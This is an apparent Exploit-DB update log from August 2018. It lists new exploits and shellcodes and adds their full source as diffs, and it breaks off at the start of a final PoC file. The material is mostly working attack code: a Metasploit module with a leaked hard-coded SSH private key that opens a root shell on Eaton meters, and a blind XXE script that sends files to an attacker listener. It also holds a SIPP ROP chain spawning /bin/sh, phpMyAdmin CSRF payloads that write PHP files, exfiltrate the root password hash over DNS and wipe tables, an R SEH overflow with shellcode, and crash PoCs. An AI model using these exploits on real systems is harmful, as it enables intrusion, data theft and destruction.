DB: 2018-08-30

21 changes to exploits/shellcodes

NASA openVSP 3.16.1 - Denial of Service (PoC)
Immunity Debugger 1.85 - Denial of Service (PoC)
ipPulse 1.92 - 'TCP Port' Denial of Service (PoC)
Fathom 2.4 - Denial Of Service (PoC)
Skype Empresarial Office 365 16.0.10730.20053 - 'Dirección de inicio de sesión' Denial of service (PoC)
Cisco AnyConnect Secure Mobility Client 4.6.01099 - 'Introducir URL' Denial of Service (PoC)
HD Tune Pro 5.70 - Denial of Service (PoC)
Drive Power Manager 1.10 - Denial Of Service (PoC)
Easy PhotoResQ 1.0 - Denial Of Service (PoC)
Trillian 6.1 Build 16 - _Sign In_ Denial of service (PoC)
SIPP 3.3 - Stack-Based Buffer Overflow
R 3.4.4 - Buffer Overflow (SEH)

Eaton Xpert Meter 13.4.0.10 - SSH Private Key Disclosure
phpMyAdmin 4.7.x - Cross-Site Request Forgery
Episerver 7 patch 4 - XML External Entity Injection
Argus Surveillance DVR 4.0.0.0 - Directory Traversal

Linux/MIPS64 - execve(/bin/sh) Shellcode (48 bytes)
Linux/ARM - execve(_/bin/sh__ [_/bin/sh_]_ NULL) Shellcode (32 Bytes)
Linux/x86 - Dual Network Stack (IPv4 and IPv6) Bind TCP Shellcode
Linux/x86 - IPv6 Reverse TCP Shellcode Generator (94 bytes)
Windows/x64 (10) - WoW64 Egghunter Shellcode (50 bytes)

exploits/hardware/remote/45283.rb

@@ -0,0 +1,134 @@
+# Exploit Title: Eaton Xpert Meter 13.4.0.10 - SSH Private Key Disclosure
+# Date: 2018-07-16
+# WebPage: https://CTRLu.net/
+# Vendor Homepage: http://www.eaton.com/
+# Vendor Advisory: http://www.eaton.com/content/dam/eaton/company/news-insights/cybersecurity/security-bulletins/PXM-Advisory.pdf
+# Software Link: http://www.eaton.com/Eaton/ProductsServices/Electrical/ProductsandServices/PowerQualityandMonitoring/PowerandEnergyMeters/PowerXpertMeter400060008000/index.htm#tabs-2
+# Version: Firmware <= 12.x and <= 13.3.x.x and below more versions may be impacted
+# Recomended to update to Version 13.4.0.10 or above
+# Tested on: Firmware 12.1.9.1 and 13.3.2.10
+# CVE : N/A
+
+# XXX: This shouldn't be necessary but is now
+require 'net/ssh/command_stream'
+
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Exploit::Remote::SSH
+  include Msf::Auxiliary::Scanner
+  include Msf::Auxiliary::CommandShell
+  include Msf::Auxiliary::Report
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Eaton Xpert Meter SSH Private Key Exposure Scanner',
+      'Description'    => %q{
+        Eaton Power Xpert Meters are used across industries for energy management, 
+        monitoring circuit loading, and identifying power quality problems. 
+        Meters running firmware 12.x.x.x or below version 13.3.x.x and below ship with 
+        a public/private key pair on Power Xpert Meter hardware that allows 
+        passwordless authentication to any other affected Power Xpert Meter. 
+        The vendor recommends updating to Version 13.4.0.10 or above. As the key is 
+        easily retrievable, an attacker can use it to gain unauthorized remote 
+        access as uid0 
+      },
+      'Author'         => [
+        'BrianWGray'
+      ],
+      'References'     => [
+        ['URL', 'http://www.eaton.com/content/dam/eaton/company/news-insights/cybersecurity/security-bulletins/PXM-Advisory.pdf'],
+        ['URL', 'https://www.ctrlu.net/vuln/0006.html']
+      ],
+      'DisclosureDate' => 'Jul 18 2018',
+      'License'        => MSF_LICENSE
+    ))
+
+    register_options([
+      Opt::RPORT(22)
+    ])
+
+    register_advanced_options([
+      OptBool.new('SSH_DEBUG',  [false, 'SSH debugging', false]),
+      OptInt.new('SSH_TIMEOUT', [false, 'SSH timeout', 10])
+    ])
+  end
+
+  def run_host(ip)
+    factory = ssh_socket_factory
+
+    ssh_opts = {
+      auth_methods:    ['publickey'],
+      port:            rport,
+      key_data:        [ key_data ],
+      hmac:            ['hmac-sha1'],
+      encryption:      ['aes128-cbc'],
+      kex:             ['diffie-hellman-group1-sha1'],
+      host_key:        ['ssh-rsa'],
+      use_agent:       false,
+      config:          false,
+      proxy:           factory
+    }
+
+    ssh_opts.merge!(verbose: :debug) if datastore['SSH_DEBUG']
+
+    begin
+      ssh = Timeout.timeout(datastore['SSH_TIMEOUT']) do
+        Net::SSH.start(ip, 'admin', ssh_opts)
+      end
+    rescue Net::SSH::Exception => e
+      vprint_error("#{ip}:#{rport} - #{e.class}: #{e.message}")
+      return
+    end
+
+    return unless ssh
+
+    print_good("#{ip}:#{rport} - Logged in as admin")
+
+    version = ssh.transport.server_version.version
+
+    report_vuln(
+      host: ip,
+      name: self.name,
+      refs: self.references,
+      info: version
+    )
+
+    shell = Net::SSH::CommandStream.new(ssh)
+
+    return unless shell
+
+    info = "Eaton Xpert Meter SSH Backdoor (#{version})"
+
+    ds_merge = {
+      'USERNAME' => 'admin'
+    }
+
+    start_session(self, info, ds_merge, false, shell.lsock)
+
+    # XXX: Ruby segfaults if we don't remove the SSH socket
+    remove_socket(ssh.transport.socket)
+  end
+
+  def rport
+    datastore['RPORT']
+  end
+  
+  def key_data
+    <<EOF
+-----BEGIN RSA PRIVATE KEY-----
+MIICWwIBAAKBgQCfwugh3Y3mLbxw0q4RZZ5rfK3Qj8t1P81E6sXjhZl7C3FyH4Mj
+C15CEzWovoQpRKrPdDaB5fVyuk6w2fKHrvHLmU2jTzq79B7A4JJEBQatAJeoVDgl
+TyfL+q6BYAtAeNsho8eP/fMwrT2vhylNJ4BTsJbmdDJMoaaHu/0IB9Z9ywIBIwKB
+gQCEX6plM+qaJeVHif3xKFAP6vZq+s0mopQjKO0bmpUczveZEsu983n8O81f7lA/
+c2j1CITvSYI6fRyhKZ0RVnCRcaQ8h/grzZNdyyD3FcqDNKO7Xf+bvYySrQXhLeQP
+I3jXGQPfBZUicGPcJclA98SBdBI1SReAUls1ZdzDwA3T8wJBAM6j1N3tYhdqal2W
+gA1/WSQrFxTt28mFeUC8enGvKLRm1Nnxk/np9qy2L58BvZzCGyHAsZyVZ7Sqtfb3
+YzqKMzUCQQDF7GrnrxNXWsIAli/UZscqIovN2ABRa2y8/JYPQAV/KRQ44vet2aaB
+trQBK9czk0QLlBfXrKsofBW81+Swiwz/AkEAh8q/FX68zY8Ssod4uGmg+oK3ZYZd
+O0kVKop8WVXY65QIN3LdlZm/W42qQ+szdaQgdUQc8d6F+mGNhQj4EIaz7wJAYCJf
+z54t9zq2AEjyqP64gi4JY/szWr8mL+hmJKoRTGRo6G49yXhYMGAOSbY1U5CsBZ+z
+zyf7XM6ONycIrYVeFQJABB8eqx/R/6Zwi8mVKMAF8lZXZB2dB+UOU12OGgvAHCKh
+7izYQtGEgPDbklbvEZ31F7H2o337V6FkXQMFyQQdHA==
+-----END RSA PRIVATE KEY-----
+EOF
+  end
+end

exploits/hardware/webapps/45286.py

@@ -0,0 +1,113 @@
+# Exploit Title: Episerver 7 patch 4 - XML External Entity Injection
+# Google Dork: N/A
+# Date: 2018-08-28
+# Exploit Author: Jonas Lejon
+# Vendor Homepage: https://www.episerver.se/
+# Version: Episerver 7 patch 4 and below
+# CVE : N/A
+
+## episploit.py - Blind XXE file read exploit for Episerver 7 patch 4 and below
+## Starts a listening webserver, so the exploits needs a public IP and unfiltered port, configure RHOST below!
+## Usage: ./episploit.py <target> [file-to-read]
+
+#!/usr/bin/python
+
+from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
+import urllib
+import re
+import sys
+import time
+import threading
+import socket
+
+SERVER_SOCKET 	= ('0.0.0.0', 8000)
+EXFIL_FILE 		= 'file:///c:/windows/win.ini' 
+
+# The public facing IP. Change this
+RHOST 			= '1.2.3.4:' + str(SERVER_SOCKET[1])
+
+EXFILTRATED_EVENT = threading.Event()
+
+class BlindXXEServer(BaseHTTPRequestHandler):
+
+	def response(self, **data):
+		code = data.get('code', 200)
+		content_type = data.get('content_type', 'text/plain')
+		body = data.get('body', '')
+
+		self.send_response(code)
+		self.send_header('Content-Type', content_type)
+		self.end_headers()
+		self.wfile.write(body.encode('utf-8'))
+		self.wfile.close()
+
+	def do_GET(self):
+		self.request_handler(self)
+
+	def do_POST(self):
+		self.request_handler(self)
+
+	def log_message(self, format, *args):
+		return
+
+	def request_handler(self, request):
+		global EXFILTRATED_EVENT
+
+		path = urllib.unquote(request.path).decode('utf8')
+		m = re.search('\/\?exfil=(.*)', path, re.MULTILINE)
+		if m and request.command.lower() == 'get':
+			data = path[len('/?exfil='):]
+			print 'Exfiltrated %s:' % EXFIL_FILE
+			print '-' * 30
+			print urllib.unquote(data).decode('utf8')
+			print '-' * 30 + '\n'
+			self.response(body='true')
+
+			EXFILTRATED_EVENT.set()
+
+		elif request.path.endswith('.dtd'):
+			print 'Sending malicious DTD file.'
+			dtd = '''<!ENTITY %% param_exfil SYSTEM "%(exfil_file)s">
+<!ENTITY %% param_request "<!ENTITY exfil SYSTEM 'http://%(exfil_host)s/?exfil=%%param_exfil;'>">
+%%param_request;''' % {'exfil_file' : EXFIL_FILE, 'exfil_host' : RHOST}
+
+			self.response(content_type='text/xml', body=dtd)
+
+		else:
+			print '[INFO] %s %s' % (request.command, request.path)
+			self.response(body='false')
+
+def send_stage1(target):
+	content = '''<?xml version="1.0"?><!DOCTYPE foo SYSTEM "http://''' + RHOST + '''/test.dtd"><foo>&exfil;</foo>'''
+	payload = '''POST /util/xmlrpc/Handler.ashx?pageid=1023 HTTP/1.1
+Host: ''' + target + '''
+User-Agent: curl/7.54.0
+Accept: */*
+Content-Length: ''' + str(len(content)) + '''
+Content-Type: application/x-www-form-urlencoded
+Connection: close
+
+''' + content
+
+	print "Sending payload.."
+	s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+	port = 80
+	s.connect((target,port))
+	s.send(payload)
+
+def main(target):
+	server = HTTPServer(SERVER_SOCKET, BlindXXEServer)
+	thread = threading.Thread(target=server.serve_forever)
+	thread.daemon = True
+	thread.start()
+	send_stage1(target)
+
+	while not EXFILTRATED_EVENT.is_set():
+		pass
+
+if __name__ == '__main__':
+	if len(sys.argv) > 1:
+		target = sys.argv[1]
+	if len(sys.argv) > 2:
+		EXFIL_FILE = sys.argv[2]
+	main(target)

exploits/ios/dos/45297.py

@@ -0,0 +1,23 @@
+# Exploit Title: Cisco AnyConnect Secure Mobility Client 4.6.01099 - 'Introducir URL' Denial of Service (PoC)
+# Discovery by: Luis Martinez
+# Discovery Date: 2018-08-29
+# Vendor Homepage: https://www.cisco.com/
+# Software Link: App Store for iOS devices
+# Tested Version: 4.6.01099
+# Vulnerability Type: Denial of Service (DoS) Local
+# Tested on OS: iPhone 7 iOS 11.4.1
+
+# Steps to Produce the Crash:
+# 1.- Run python code: Cisco_AnyConnect_Secure_Mobility_Client_4.6.01099.py
+# 2.- Copy content to clipboard
+# 3.- Open App Cisco AnyConnect Secure Mobility Client
+# 4.- Diagnosticos
+# 5.- Certificados
+# 6.- Importar certificado de usuario...
+# 7.- Paste ClipBoard on "Introducir URL"
+# 8.- Crashed
+
+#!/usr/bin/env python
+
+buffer = "\x41" * 12380000
+print (buffer)

exploits/linux/local/45288.py

@@ -0,0 +1,131 @@
+# Exploit Author: Juan Sacco <jsacco@exploitpack.com> - http://exploitpack.com
+#
+# Tested on: Kali i686 GNU/Linux
+#
+# Description: SIPP 3.3 is prone to a local unauthenticated stack-based overflow
+# The vulnerability is due to an unproper filter of user suppliedinput while reading
+# the configuration file and parsing the malicious crafted value.
+#
+# Program: SIPP 3.3 Traffic generator for the SIP protocol
+# SIPp is a free Open Source test tool / traffic generator
+# for the SIP protocol. Filename: pool/main/s/sipp/sipp_3.3-1kali2_i386.deb
+#
+# Vendor: http://sipp.sourceforge.net/
+# gdb-peda$ checksec
+# CANARY    : disabled
+# FORTIFY   : disabled
+# NX        : ENABLED
+# PIE       : ENABLED
+# RELRO     : Partial
+#
+#[----------------------------------registers-----------------------------------]
+# EAX: 0x41414141 ('AAAA')
+# EBX: 0x25 ('%')
+# ECX: 0xb7c9e340 --> 0x4cf8b0 ('A' <repeats 200 times>...)
+# EDX: 0xb7c9e200 --> 0x0
+# ESI: 0xb7ca0748 --> 0x0
+# EDI: 0x0
+# EBP: 0xbfffc898 --> 0xbfffc8c8 --> 0xbfffc8e8 --> 0xbfffc908 -->0xb7c9d000 --> 0x1d4d6c
+# ESP: 0xbfffc898 --> 0xbfffc8c8 --> 0xbfffc8e8 --> 0xbfffc908 -->0xb7c9d000 --> 0x1d4d6c
+# EIP: 0x43cdcf (mov    eax,DWORD PTR [eax+0xc])
+# EFLAGS: 0x10216 (carry PARITY ADJUST zero sign trap INTERRUPTdirection overflow)
+# [-------------------------------------code-------------------------------------]
+#   0x43cdc2: call   0x4053e6
+#   0x43cdc7: add    eax,0x50239
+#   0x43cdcc: mov    eax,DWORD PTR [ebp+0x8]
+# => 0x43cdcf: mov    eax,DWORD PTR [eax+0xc]
+#   0x43cdd2: pop    ebp
+#   0x43cdd3: ret
+#   0x43cdd4: push   ebp
+#   0x43cdd5: mov    ebp,esp
+# [------------------------------------stack-------------------------------------]
+# 0000| 0xbfffc898 --> 0xbfffc8c8 --> 0xbfffc8e8 --> 0xbfffc908 -->0xb7c9d000 --> 0x1d4d6c
+# 0004| 0xbfffc89c --> 0x43c159 (add    esp,0x10)
+# 0008| 0xbfffc8a0 ("AAAA\377\377\377\377\310\310\377\277C\301C")
+# 0012| 0xbfffc8a4 --> 0xffffffff
+# 0016| 0xbfffc8a8 --> 0xbfffc8c8 --> 0xbfffc8e8 --> 0xbfffc908 -->0xb7c9d000 --> 0x1d4d6c
+# 0020| 0xbfffc8ac --> 0x43c143 (add    eax,0x50ebd)
+# 0024| 0xbfffc8b0 --> 0x597ba0 --> 0x0
+# 0028| 0xbfffc8b4 --> 0xffffffff
+# [------------------------------------------------------------------------------]
+# Legend: code, data, rodata, value
+# Stopped reason: SIGSEGV
+# 0x41414141 in ?? ()
+
+import os, subprocess
+from struct import pack
+
+# rop execve ( bin/sh )
+rop = "A"*2208 # junk
+rop += pack('<I', 0x080e9101) # pop edx ; pop ebx ; pop esi ; pop edi; pop ebp ; ret
+rop += pack('<I', 0x0811abe0) # @ .data
+rop += pack('<I', 0x41414141) # padding
+rop += pack('<I', 0x41414141) # padding
+rop += pack('<I', 0x41414141) # padding
+rop += pack('<I', 0x41414141) # padding
+rop += pack('<I', 0x0807b744) # pop eax ; ret
+rop += '/bin'
+rop += pack('<I', 0x0810ae08) # mov dword ptr [edx], eax ; pop ebx ;pop ebp ; ret
+rop += pack('<I', 0x41414141) # padding
+rop += pack('<I', 0x41414141) # padding
+rop += pack('<I', 0x080e9101) # pop edx ; pop ebx ; pop esi ; popedi ;pop ebp ; ret
+rop += pack('<I', 0x0811abe4) # @ .data + 4
+rop += pack('<I', 0x41414141) # padding
+rop += pack('<I', 0x41414141) # padding
+rop += pack('<I', 0x41414141) # padding
+rop += pack('<I', 0x41414141) # padding
+rop += pack('<I', 0x0807b744) # pop eax ; ret
+rop += '//sh'
+rop += pack('<I', 0x0810ae08) # mov dword ptr [edx], eax ; pop ebx ;pop ebp ; ret
+rop += pack('<I', 0x41414141) # padding
+rop += pack('<I', 0x41414141) # padding
+rop += pack('<I', 0x080e9101) # pop edx ; pop ebx ; pop esi ; pop edi; pop ebp ; ret
+rop += pack('<I', 0x0811abe8) # @ .data + 8
+rop += pack('<I', 0x41414141) # padding
+rop += pack('<I', 0x41414141) # padding
+rop += pack('<I', 0x41414141) # padding
+rop += pack('<I', 0x41414141) # padding
+rop += pack('<I', 0x080b4970) # xor eax, eax ; pop esi ; pop ebp ; ret
+rop += pack('<I', 0x41414141) # padding
+rop += pack('<I', 0x41414141) # padding
+rop += pack('<I', 0x0810ae08) # mov dword ptr [edx], eax ; pop ebx ;pop ebp ; ret
+rop += pack('<I', 0x41414141) # padding
+rop += pack('<I', 0x41414141) # padding
+rop += pack('<I', 0x080dcf4b) # pop ebx ; pop esi ; pop edi ; ret
+rop += pack('<I', 0x0811abe0) # @ .data
+rop += pack('<I', 0x41414141) # padding
+rop += pack('<I', 0x41414141) # padding
+rop += pack('<I', 0x08067b43) # pop ecx ; ret
+rop += pack('<I', 0x0811abe8) # @ .data + 8
+rop += pack('<I', 0x080e9101) # pop edx ; pop ebx ; pop esi ; pop edi; pop ebp ; ret
+rop += pack('<I', 0x0811abe8) # @ .data + 8
+rop += pack('<I', 0x0811abe0) # padding without overwrite ebx
+rop += pack('<I', 0x41414141) # padding
+rop += pack('<I', 0x41414141) # padding
+rop += pack('<I', 0x41414141) # padding
+rop += pack('<I', 0x080b4970) # xor eax, eax ; pop esi ; pop ebp ; ret
+rop += pack('<I', 0x41414141) # padding
+rop += pack('<I', 0x41414141) # padding
+rop += pack('<I', 0x080e571f) # inc eax ; ret
+rop += pack('<I', 0x080e571f) # inc eax ; ret
+rop += pack('<I', 0x080e571f) # inc eax ; ret
+rop += pack('<I', 0x080e571f) # inc eax ; ret
+rop += pack('<I', 0x080e571f) # inc eax ; ret
+rop += pack('<I', 0x080e571f) # inc eax ; ret
+rop += pack('<I', 0x080e571f) # inc eax ; ret
+rop += pack('<I', 0x080e571f) # inc eax ; ret
+rop += pack('<I', 0x080e571f) # inc eax ; ret
+rop += pack('<I', 0x080e571f) # inc eax ; ret
+rop += pack('<I', 0x080e571f) # inc eax ; ret
+rop += pack('<I', 0x080c861f) # int 0x80
+
+try:
+   print("[*] SIPP 3.3 Buffer Overflow by Juan Sacco")
+   print("[*] Please wait.. running")
+   subprocess.call(["sipp ", rop])
+except OSError as e:
+   if e.errno == os.errno.ENOENT:
+       print "SIPP  not found!"
+   else:
+    print "Error executing exploit"
+   raise

exploits/php/webapps/45284.txt

@@ -0,0 +1,35 @@
+# Exploit Title: phpMyAdmin 4.7.x - Cross-Site Request Forgery
+# Date: 2018-08-28
+# Exploit Author: VulnSpy
+# Vendor Homepage: https://www.phpmyadmin.net/
+# Software Link: https://www.phpmyadmin.net/downloads/
+# Version: Versions 4.7.x (prior to 4.7.7)
+# Tested on: php7 mysql5
+# CVE: CVE-2017-1000499
+
+# Exploit CSRF - Modifying the password of current user
+
+<p>Hello World</p>
+<img src="
+http://server/sql.php?db=mysql&table=user&sql_query=SET%20password
+%20=%20PASSWORD(%27www.vulnspy.com%27)" style="display:none;" />
+
+# Exploit CSRF - Arbitrary File Write
+
+<p>Hello World</p>
+<img src="
+http://server/sql.php?db=mysql&table=user&sql_query=select
+'<?php phpinfo();?>' into outfile '/var/www/html/test.php';"
+style="display:none;" />
+
+# Exploit CSRF - Data Retrieval over DNS
+
+SELECT LOAD_FILE(CONCAT('\\\\',(SELECT password FROM mysql.user WHERE
+user='root' LIMIT 1),'.vulnspy.com\\test'));
+
+# Exploit CSRF - Empty All Rows From All Tables
+
+<p>Hello World</p>
+<img src="
+http://server/import.php?db=mysql&table=user&sql_query=DROP+PROCEDURE+IF+EXISTS+EMPT%3B%0ADELIMITER+%24%24%0A++++CREATE+PROCEDURE+EMPT%28%29%0A++++BEGIN%0A++++++++DECLARE+i+INT%3B%0A++++++++SET+i+%3D+0%3B%0A++++++++WHILE+i+%3C+100+DO%0A++++++++++++SET+%40del+%3D+%28SELECT+CONCAT%28%27DELETE+FROM+%27%2CTABLE_SCHEMA%2C%27.%27%2CTABLE_NAME%29+FROM+information_schema.TABLES+WHERE+TABLE_SCHEMA+NOT+LIKE+%27%25_schema%27+and+TABLE_SCHEMA%21%3D%27mysql%27+LIMIT+i%2C1%29%3B%0A++++++++++++PREPARE+STMT+FROM+%40del%3B%0A++++++++++++EXECUTE+stmt%3B%0A++++++++++++SET+i+%3D+i+%2B1%3B%0A++++++++END+WHILE%3B%0A++++END+%24%24%0ADELIMITER+%3B%0A%0ACALL+EMPT%28%29%3B%0A"
+style="display:none;" />

exploits/windows/local/45289.py

@@ -0,0 +1,73 @@
+#--------------------------------------------------------#
+#Exploit Title: R v3.4.4 - (SEH) Buffer Overflow Exploit
+#Exploit Author : ZwX
+#Exploit Date: 2018-08-22
+#Vendor Homepage : https://www.r-project.org/
+#Tested on OS: Windows 7
+#Social: twitter.com/ZwX2a
+#contact: msk4@live.fr
+#Website: http://zwx-pentester.fr/
+#--------------------------------------------------------#
+
+
+#Technical Details & Description:
+#================================
+'''A local buffer overflow vulnerability has been discovered in the official R v3.4.4 software.
+The vulnerability allows local attackers to overwrite the registers (example eip) to compromise the local software process.
+The issue can be exploited by local attackers with system privileges to compromise the affected local computer system.
+The vulnerability is marked as classic buffer overflow issue'''
+
+
+# Manual steps to reproduce the vulnerability: under GUI preferences
+# paste bo.txt contents into 'Language for menus and messages' click ok --> Now the calculator executes!
+
+
+#!/usr/bin/python
+
+from struct import pack
+buffer = "x41" * 900
+a = "\xeb\x14\x90\x90"
+b = pack("<I",0x6cb85492)  #pop esi # pop ebp # ret 04 |  {PAGE_EXECUTE_READ} [R.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v3.4.4 (C:Program FilesRR-3.4.4bini386R.dll)
+calc=("\xdb\xd7\xd9\x74\x24\xf4\xb8\x79\xc4\x64\xb7\x33\xc9\xb1\x38"
+"\x5d\x83\xc5\x04\x31\x45\x13\x03\x3c\xd7\x86\x42\x42\x3f\xcf"
+"\xad\xba\xc0\xb0\x24\x5f\xf1\xe2\x53\x14\xa0\x32\x17\x78\x49"
+"\xb8\x75\x68\xda\xcc\x51\x9f\x6b\x7a\x84\xae\x6c\x4a\x08\x7c"
+"\xae\xcc\xf4\x7e\xe3\x2e\xc4\xb1\xf6\x2f\x01\xaf\xf9\x62\xda"
+"\xa4\xa8\x92\x6f\xf8\x70\x92\xbf\x77\xc8\xec\xba\x47\xbd\x46"
+"\xc4\x97\x6e\xdc\x8e\x0f\x04\xba\x2e\x2e\xc9\xd8\x13\x79\x66"
+"\x2a\xe7\x78\xae\x62\x08\x4b\x8e\x29\x37\x64\x03\x33\x7f\x42"
+"\xfc\x46\x8b\xb1\x81\x50\x48\xc8\x5d\xd4\x4d\x6a\x15\x4e\xb6"
+"\x8b\xfa\x09\x3d\x87\xb7\x5e\x19\x8b\x46\xb2\x11\xb7\xc3\x35"
+"\xf6\x3e\x97\x11\xd2\x1b\x43\x3b\x43\xc1\x22\x44\x93\xad\x9b"
+"\xe0\xdf\x5f\xcf\x93\xbd\x35\x0e\x11\xb8\x70\x10\x29\xc3\xd2"
+"\x79\x18\x48\xbd\xfe\xa5\x9b\xfa\xf1\xef\x86\xaa\x99\xa9\x52"
+"\xef\xc7\x49\x89\x33\xfe\xc9\x38\xcb\x05\xd1\x48\xce\x42\x55"
+"\xa0\xa2\xdb\x30\xc6\x11\xdb\x10\xa5\xaf\x7f\xcc\x43\xa1\x1b"
+"\x9d\xe4\x4e\xb8\x32\x72\xc3\x34\xd0\xe9\x10\x87\x46\x91\x37"
+"\x8b\x15\x7b\xd2\x2b\xbf\x83")
+nops = "\x90" * 20
+
+poc = buffer + a + b + nops + calc
+file = open("bo.txt","w")
+file.write(poc)
+file.close()
+
+print "POC Created by ZwX"
+
+
+#Solution - Fix & Patch:
+#=======================
+'''The solution could be to restrict and filter the number of characters on input of 'Language for menus and messages' '''
+
+
+# Disclaimer:
+#===============
+
+'''Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due
+credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the
+author. The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related
+information or exploits by the author or elsewhere.
+
+
+
+                                    Copyright A(c) 2018 | ZwX - Security Researcher (Software & web application)'''

exploits/windows_x86-64/dos/45281.py

@@ -0,0 +1,36 @@
+# Exploit Title: NASA openVSP 3.16.1 - Denial of Service (PoC)
+# Exploit Author : L0RD
+# Date: 2018-08-28
+# Vendor Homepage : https://software.nasa.gov/software/LAR-17491-1
+# Software link: https://github.com/nasa/OpenVSP
+# Version: 3.16.1
+# Tested on: Windows 10
+# CVE: N/A
+
+# Description :
+# The Vehicle Sketch Pad (VSP) is an aircraft geometry tool for rapid
+# evaluation of advanced design concepts.
+# for more information , check out this page :
+# https://software.nasa.gov/featuredsoftware/openvsp
+
+# Steps to reproduce:
+# 1) Run the python exploit code and open "poc.txt" file
+# 2) Copy the content of file
+# 3) Open "vsp.exe"
+# 4) Navigate to "Geom browser" and click on Add
+# 5) Then Navigate to "pod" and click on sub
+# 6) Click on "Add" and paste the content of "poc.txt" into the "name" field
+# 7) Click on add and Crash!
+
+#!/usr/bin/python
+
+buffer = "A" * 5000
+payload = buffer
+try:
+    f=open("poc.txt","w")
+    print "[+] Creating %s bytes payload..." %len(payload)
+    f.write(payload)
+    f.close()
+    print "[+] File created!"
+except:
+    print "File cannot be created"

exploits/windows_x86-64/dos/45295.py

@@ -0,0 +1,19 @@
+# Exploit Title: Skype Empresarial Office 365 16.0.10730.20053 - 'Dirección de inicio de sesión' Denial of service (PoC)
+# Discovery by: Samuel Cruz
+# Discovery Date; 2018-08-29
+# Vendor Homepage: https://www.skype.com/es/business/
+# Tested Version: 16.0.10730.20053
+# Tested on OS: Windows 10 Pro x64 es/home/
+
+#Steps to produce the crash
+#1.- Run python code : python SkypeforBusiness_16.0.10730.20053.py
+#2.- Open SkypeforBusiness.txt and copy context to clipboard
+#3.- Open Skype for business
+#4.- Paste clipboard on "Dirección de inicio de sesión"
+#5.- Iniciar sesión
+#6.- Crashed
+
+buffer = "\x41" * 595
+f = open ("SkypeforBusiness.txt", "w")
+f.write(buffer)
+f.close()

exploits/windows_x86-64/dos/45301.py

@@ -0,0 +1,21 @@
+#Exploit Title: Trillian 6.1 Build 16 - "Sign In" Denial of service (PoC)
+#Discovery by: Jose Miguel Gonzalez
+#Discovery Date; 2018-08-29
+#Vendor Homepage: https://www.trillian.im/
+#Software Link: https://www.trillian.im/download/
+#Tested Version: 6.1 Build 16
+#Tested on OS: Windows 10 Single Language x64
+
+#Steps to produce the crash
+#1.- Run the python code: trillian.py
+#2.- Open trillian.txt and copy context to clipboard
+#3.- Open Trillian application
+#4.- Paste clipboard on "Username"
+#5.- Put "1234" on "Password"
+#5.- Sign In
+#6.- Crashed
+
+mem = "\x41" * 214
+f = open ("trillian.txt", "w")
+f.write(mem)
+f.close()

exploits/windows_x86/dos/45282.py

@@ -0,0 +1,25 @@
+# Exploit Title: Immunity Debugger 1.85 - Denial of Service (PoC)
+# Author: Gionathan "John" Reale
+# Date: 2018-08-28
+# Homepage: https://www.immunityinc.com/
+# Software Link: https://www.immunityinc.com/products/debugger/index.html
+# Tested Version: v1.85
+# Tested on OS: Windows 7 32-bit
+# Steps to Reproduce: Run the python exploit script, it will create a new 
+# file with the name "exploit.exe.txt".Start the program. In the new window click "File" >"Open". 
+# Now change the "Files of type" to # "Any file" and select "exploit.exe.txt" . 
+# Click "Open" and you will see a crash.
+
+#!/usr/bin/python
+   
+buffer = "A" * 6000
+
+payload = buffer
+try:
+    f=open("exploit.exe.txt","w")
+    print "[+] Creating %s bytes evil payload.." %len(payload)
+    f.write(payload)
+    f.close()
+    print "[+] File created!"
+except:
+    print "File cannot be created"

exploits/windows_x86/dos/45285.py

@@ -0,0 +1,26 @@
+# Exploit Title: ipPulse 1.92 - 'TCP Port' Denial of Service (PoC)
+# Discovery by: Diego Santamaria
+# Discovery Date: 2018-08-28
+# Vendor Homepage: https://www.netscantools.com/ippulseinfo.html
+# Software Link: http://download.netscantools.com/ipls192.zip
+# Tested Version: 1.92
+# Vulnerability Type: Denial of Service (DoS) Local
+# Tested on OS: Windows 7 Professional
+ 
+# Steps to Reproduce: 
+
+# 1. Run the python code TCP_port.py 
+# 2. Open TCP_exploit.txt and copy the content 
+# 3. Open ipPulse.exe 
+# 4. Choose 'Target Editor' 
+# 5. write '1' in 'IP Adreess'
+# 6. Paste the content from exploit.txt on 'TCP Port'
+# 7. Press 'Add Above Fields to Target List'
+# 8. Press ok and Crashed
+ 
+#!/usr/bin/env python
+
+content = "\x41" * 4087
+f = open ("TCP_exploit.txt", "w")
+f.write(content)
+f.close()

exploits/windows_x86/dos/45294.py

@@ -0,0 +1,25 @@
+# Exploit Title: Fathom 2.4 - Denial Of Service (PoC)
+# Author: Gionathan "John" Reale
+# Discovey Date: 2018-08-28
+# Homepage: https://fathom.concord.org/
+# Software Link: https://fathom.concord.org/download/
+# Tested Version: v2.4
+# Tested on OS: Windows 7 32-bit
+# Steps to Reproduce: Run the python exploit script, it will create a new 
+# file with the name "exploit.txt". Copy the content of the new file "exploit.txt". 
+# Now start the program, in the field named: "Authorization Code" paste the "exploit.txt" content copied eariler.
+# Click "Activate" and see a crash! 
+
+#!/usr/bin/python
+   
+buffer = "A" * 6000
+
+payload = buffer
+try:
+    f=open("exploit.txt","w")
+    print "[+] Creating %s bytes evil payload.." %len(payload)
+    f.write(payload)
+    f.close()
+    print "[+] File created!"
+except:
+    print "File cannot be created"

exploits/windows_x86/dos/45298.py

@@ -0,0 +1,25 @@
+# Exploit Title: HD Tune Pro 5.70 - Denial Of Service (PoC)
+# Author: Gionathan "John" Reale
+# Discovey Date: 2018-08-29
+# Homepage: https://www.hdtune.com/
+# Software Link: https://www.hdtune.com/download.html
+# Tested Version: v5.70
+# Tested on OS: Windows 7 32-bit
+# Steps to Reproduce: Run the python exploit script, it will create a new 
+# file with the name "exploit.txt". Copy the content of the new file "exploit.txt". 
+# Now start the program, when inside the program click "File" > "Options.." > "Save". Now in the field named: "Folder / file name" paste the "exploit.txt" content copied eariler.
+# Click "Apply" > "OK" and see a crash!  
+
+#!/usr/bin/python
+   
+buffer = "A" * 6000
+
+payload = buffer
+try:
+    f=open("exploit.txt","w")
+    print "[+] Creating %s bytes evil payload.." %len(payload)
+    f.write(payload)
+    f.close()
+    print "[+] File created!"
+except:
+    print "File cannot be created"

exploits/windows_x86/dos/45299.py

@@ -0,0 +1,25 @@
+# Exploit Title: Drive Power Manager 1.10 - Denial Of Service (PoC)
